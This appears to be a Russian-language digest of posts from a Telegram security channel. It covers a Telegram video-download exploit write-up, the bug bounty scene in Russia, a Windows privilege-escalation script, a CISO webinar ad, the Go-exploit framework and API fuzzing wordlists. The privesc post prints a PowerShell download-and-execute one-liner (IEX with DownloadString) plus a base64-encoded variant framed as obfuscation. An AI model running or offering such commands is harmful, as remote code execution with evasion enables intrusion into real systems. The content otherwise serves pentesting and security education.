Убойное видео. Как я написал эксплоит для бага в Telegram и что было дальше
#xakep #telegram #1click

Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)

Не­дав­но мне на гла­за попал­ся пост при­мер­но такого содер­жания: «В Telegram выяв­лена новая уяз­вимость, свя­зан­ная с заг­рузкой виде­оро­ликов». К пос­ту при­лага­лась демонс­тра­ция: поль­зователь получа­ет видео, при тапе по которо­му Telegram пыта­ется уста­новить сто­рон­нее при­ложе­ние. При этом проб­лема не прив­лекла осо­бен­ного вни­мания. Я решил разоб­рать­ся, работа­ет ли спо­соб, и написать к нему экс­пло­ит.

🔓 Читать дальше

🌚 @poxek | 📹 YouTube

Bug Bounty в России: как дела с белыми русскими хакерами?
#vk #vkbugbounty

Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)

Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.

➡️ Читать далее

🌚 @poxek | 📹 YouTube

На 10к подписчиков ждите кое что классное 🌚
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))

С любовью, Похек ❤️

Баг Баунти для Блю тим

🌚 @poxek | 📹 YouTube

💻 Yet Another Windows PrivEsc Script
#windows #privesc

Маленький воскресный пост про очередной небольшой скрипт для поиска мисконфигураций в Windows, которые приводят к повышению привилегий. Но тем не менее репа собрали более 500 звёзд, значит заслуживает внимания.

Эксплуатация:

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")

И вот простенькая обфускация:

$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")'))
powershell -e $encoded

🧩 Github

🌚 @poxek | 📹 YouTube

«Ты приходишь ко мне просить бюджет на ИБ, но...»

Защита бюджета в августе для CISO — жаркое время. Успех предприятия зависит не только от способности предвидеть риски и просчитать стоимость. Главное умение переговорщика — говорить именно так, как принято в финансовых кругах 💵

Есть информация, что на вебинаре 30 июля в 11:00 можно будет пообщаться с CISO в формате непринужденной дискуссии и узнать больше про доказательную базу при обосновании бюджета ИБ, а также узнать у CFO, как уважительно подбирать аргументы в беседе с финансовым кланом💰

О чём еще поведают уважаемые представители МТС RED:
➡ почему на ИБ стоит делать высокие ставки;
➡ как посчитать бюджет на примере мануфактур и предприятий;
➡ ИТ-директор как надёжный союзник в любой кампании;
➡ тактика и манёвры защиты глазами финансового консильери.

Кому будет полезно:
⏺ директорам или руководителям службы ИБ/ИТ;
⏺ финансовый директорам;
⏺ директорам по трансформации бизнеса.

Регистрируйтесь на вебинар и готовьте вопросы! Если что, нас тут не было 🎩

Go Exploit Framework
#go

Go-exploit — это фреймворк для разработки эксплойтов на языке Go. Этот фреймворк помогает разрабам эксплойтов создавать небольшие, портативные эксплойты. Фреймворк был разработан для упрощения массового сканирования, эксплуатации и интеграции с другими инструментами.

Документацию по API можно найти ТУТ.

Фреймворк Go Exploit включает следующие этапы, которые могут быть связаны друг с другом или выполняться независимо:

Шаг 1 - Проверка цели
Шаг 2 - Сканирование версии
Шаг 3 - Эксплуатация
Шаг 4 - Управление и контроль


Особенности Go Exploit
Фреймворк Go Exploit включает следующие дополнительные функции:

➡️Автоматическое обнаружение SSL/TLS на удаленной цели.
➡️Полная поддержка работы через прокси.
➡️Вывод в формате ключ-значение или JSON для легкой интеграции в другие автоматизированные системы.
➡️Встроенные Java гаджеты, классы и инфраструктура LDAP.
➡️Множество пейлоадов для реверс шеллов, дропперов и бинд шеллов.
➡️Функции, интегрирующие эксплуатацию с другими инструментами или фреймворками, такими как Metasploit и Sliver.
➡️Встроенный C2 для перехвата зашифрованных/незашифрованных шеллов или размещения имплантов.
➡️Поддержка различных форматов целей, включая списки, файлы, VulnCheck IP-Intel и другие.

Мое мнение об этой тулзе: пока сыровато и маловато, НО я вижу перспективу в этой тулзе и возможно когда-нибудь она стрельнет или обзаведётся кучей "обвязок", которые сделают данную тулзу полноценно боевой

🌚 @poxek | 📹 YouTube

API FUZZING LISTS
#api #fuzzing

Вне очереди пост, очень вкусный сборник фаззинг вордлистов для API

Описание данного списка от автора:
744,000+ endpoints
357,000+ object properties
211,000+ object names
127,000+ query parameters
74,000+ parameter values
35,000+ path parameters
8,300+ headers
5,300+ paths
880+ common ports

Взял ТУТ

🌚 @poxek | 📹 YouTube